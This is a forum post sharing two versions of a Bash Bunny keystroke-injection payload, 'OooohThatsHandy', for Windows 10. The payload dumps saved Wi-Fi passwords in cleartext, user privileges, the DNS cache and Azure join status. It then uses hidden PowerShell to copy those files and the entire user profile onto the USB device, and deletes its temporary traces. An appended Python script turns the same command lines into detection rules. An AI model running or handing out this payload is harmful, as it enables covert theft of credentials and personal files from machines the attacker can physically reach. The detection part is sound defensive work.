[PAYLOAD] OooohThatsHandy - Gather handy data


PeteDavis91


Just got my first payload working properly and wanted to share. Hope someone finds it handy! 

 

REM Title:         			OooohThatsHandy
REM Description:   			Extract useful info such as nmap, wifi keys, DNS Cache, User privileges and group memberships, user folder contents and images
REM OS:			   			Designed for Win 10
REM Author:        			Twitter @PeteDavis91
REM Version:       			0.3
REM Category:      			Exfiltration
REM Attackmodes:   			HID Storage RNDIS_ETHERNET
REM Credz:		   			Hak5 Darren obviously, 0iphori3 and Cribbit 


REM LED CODES:
REM SOLID BLUE LED:			Setting Up
REM FAST BLUE LED: 			Creating Data
REM VERY FAST BLUE LED:		Exporting Data Created and Discovered
REM SOLID WHITE LED:		Cleaning up and finalizing
REM FINISH GREEN LED: 		Safe to remove your Bash Bunny - Enjoy the data 

REM This section sets up the BashBunny
LED B SOLID
Q DELAY 1000
DUCKY_LANG gb
ATTACKMODE HID STORAGE RNDIS_ETHERNET
Q DELAY 1000
GET TARGET_IP
Q DELAY 500

REM This section runs commands to create logs and data for export
LED B FAST
Q DELAY 500
mkdir /root/hostsideloot
Q DELAY 1000
nmap -sC -O -F $TARGET_IP >> /root/hostsideloot/1.txt
Q DELAY 1000
RUN WIN 'cmd /minimized /c mkdir %TEMP%\LOOK && netsh wlan show profile * key=clear > %TEMP%\LOOK\2.txt & whoami /all > %TEMP%\LOOK\3.txt'
Q DELAY 1000
RUN WIN 'cmd /minimized /c ipconfig /displaydns > %TEMP%\LOOK\4.txt' 
Q DELAY 750


REM This section exports the previously created data as well as the running user profile with images and documents 
LED B VERYFAST
Q DELAY 50
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:TEMP\\LOOK \$destination\\loot\\"
Q DELAY 1000
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:USERPROFILE \$destination\\loot\\"
Q DELAY 1000
mv /root/hostsideloot/1.txt /root/udisk/loot/

REM Cleanup and finalizing
LED W SOLID
RUN WIN 'cmd /c rmdir /s /q %TEMP%\LOOK' 
rmdir /root/hostsideloot


ATTACKMODE FINISH
LED G FINISH 

 


REM Title:         		OooohThatsHandy
REM Description:   		Extract useful information such as nmap, wifi keys, DNS Cache, User privileges and group memberships, user folder contents with images, Azure Join Info
REM OS:			   		Designed for Win 10
REM Author:        		Twitter @PeteDavis91
REM Version:       		0.4
REM Category:      		Exfiltration
REM Attackmodes:   		HID Storage RNDIS_ETHERNET
REM Credz:		   		Hak5 Darren obviously, 0iphori3 and Cribbit 


REM LED CODES:
REM SOLID BLUE LED:			Setting Up
REM FAST BLUE LED: 			Creating Data
REM VERY FAST BLUE LED:		Exporting Data Created and Discovered
REM SOLID WHITE LED:		Cleaning up and finalizing
REM FINISH GREEN LED: 		Safe to remove your Bash Bunny - Enjoy the data 

REM This section sets up the BashBunny
LED B SOLID
Q DELAY 1000
DUCKY_LANG gb
ATTACKMODE HID STORAGE RNDIS_ETHERNET
Q DELAY 1000
GET TARGET_IP
Q DELAY 500

REM This section runs commands to create logs and data for export
LED B FAST
Q DELAY 500
mkdir /root/hostsideloot
Q DELAY 1000
nmap -sC -O -F $TARGET_IP >> /root/hostsideloot/1.txt
Q DELAY 1000
RUN WIN 'cmd /minimized /c mkdir %TEMP%\LOOK && netsh wlan show profile * key=clear > %TEMP%\LOOK\2.txt & whoami /all > %TEMP%\LOOK\3.txt'
Q DELAY 1000
RUN WIN 'cmd /minimized /c ipconfig /displaydns > %TEMP%\LOOK\4.txt & dsregcmd /status > %TEMP%\LOOK\5.txt' 
Q DELAY 750


REM This section exports the previously created data as well as the running user profile with images and documents 
LED B VERYFAST
Q DELAY 50
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:TEMP\\LOOK \$destination\\loot\\"
Q DELAY 1000
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:USERPROFILE \$destination\\loot\\"
Q DELAY 1000
mv /root/hostsideloot/1.txt /root/udisk/loot/

REM Cleanup and finalizing
LED W SOLID
RUN WIN 'cmd /c rmdir /s /q %TEMP%\LOOK' 
rmdir /root/hostsideloot


ATTACKMODE FINISH
LED G FINISH 

 

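From the defender's side, every step of the payload above leaves a distinct process-creation trail (netsh wlan ... key=clear, whoami /all, ipconfig /displaydns, dsregcmd /status, a hidden PowerShell that looks up the BashBunny volume, robocopy of the user profile), and they all fire within a few seconds of a new HID/storage device appearing. The following detection script is an added example, not part of the original post: it runs a set of rules over constructed, simplified 4688-style process-creation records and alerts when several distinct rules fire on one host inside a short window. The log format, host names and timestamps are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records (simplified 4688-style; not real logs).
SAMPLE_LOG = r"""
2024-05-01T10:00:01 host1 explorer.exe CommandLine="C:\Windows\explorer.exe"
2024-05-01T10:00:05 host1 cmd.exe CommandLine="cmd /minimized /c mkdir %TEMP%\LOOK && netsh wlan show profile * key=clear > %TEMP%\LOOK\2.txt & whoami /all > %TEMP%\LOOK\3.txt"
2024-05-01T10:00:07 host1 cmd.exe CommandLine="cmd /minimized /c ipconfig /displaydns > %TEMP%\LOOK\4.txt & dsregcmd /status > %TEMP%\LOOK\5.txt"
2024-05-01T10:00:09 host1 powershell.exe CommandLine="powershell -W Hidden -c $destination = ((gwmi win32_volume -f 'label=''BashBunny''').Name); robocopy $env:USERPROFILE $destination\loot\"
2024-05-01T14:30:00 host2 cmd.exe CommandLine="cmd /c ipconfig /displaydns"
"""

# One rule per observable step of the payload; any single rule alone is noisy,
# so detect() requires several to fire together on the same host.
RULES = {
    "wifi_keys_cleartext": re.compile(r"netsh\s+wlan\s+show\s+profile.*key=clear", re.I),
    "whoami_all": re.compile(r"\bwhoami\s+/all\b", re.I),
    "dns_cache_dump": re.compile(r"ipconfig\s+/displaydns", re.I),
    "azure_join_status": re.compile(r"dsregcmd\s+/status", re.I),
    "hidden_ps_volume_lookup": re.compile(r"powershell.*-W\s+Hidden.*win32_volume", re.I),
    "robocopy_userprofile": re.compile(r"robocopy\s+\$env:USERPROFILE", re.I),
}

def parse_records(text):
    """Yield (timestamp, host, command_line) for each record in the assumed format."""
    for line in text.strip().splitlines():
        ts, host, _image, rest = line.split(" ", 3)
        cmdline = rest[len('CommandLine="'):].rstrip('"')
        yield datetime.fromisoformat(ts), host, cmdline

def detect(text, window_s=60, min_rules=3):
    """Return {host: sorted rule names} for hosts where at least min_rules
    distinct rules fire within any window_s-second window."""
    hits = defaultdict(list)
    for ts, host, cmdline in parse_records(text):
        for name, pat in RULES.items():
            if pat.search(cmdline):
                hits[host].append((ts, name))
    alerts = {}
    for host, events in hits.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            window = {n for t, n in events[i:] if t - start <= timedelta(seconds=window_s)}
            if len(window) >= min_rules:
                alerts[host] = sorted(set(alerts.get(host, [])) | window)
    return alerts

if __name__ == "__main__":
    for host, rules in detect(SAMPLE_LOG).items():
        print(f"ALERT {host}: {', '.join(rules)}")
```

Pairing this with a USB device-insertion event (Event ID 4663/6416 or Sysmon) on the same host in the same window cuts the remaining false positives from admins running one of these commands by hand.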
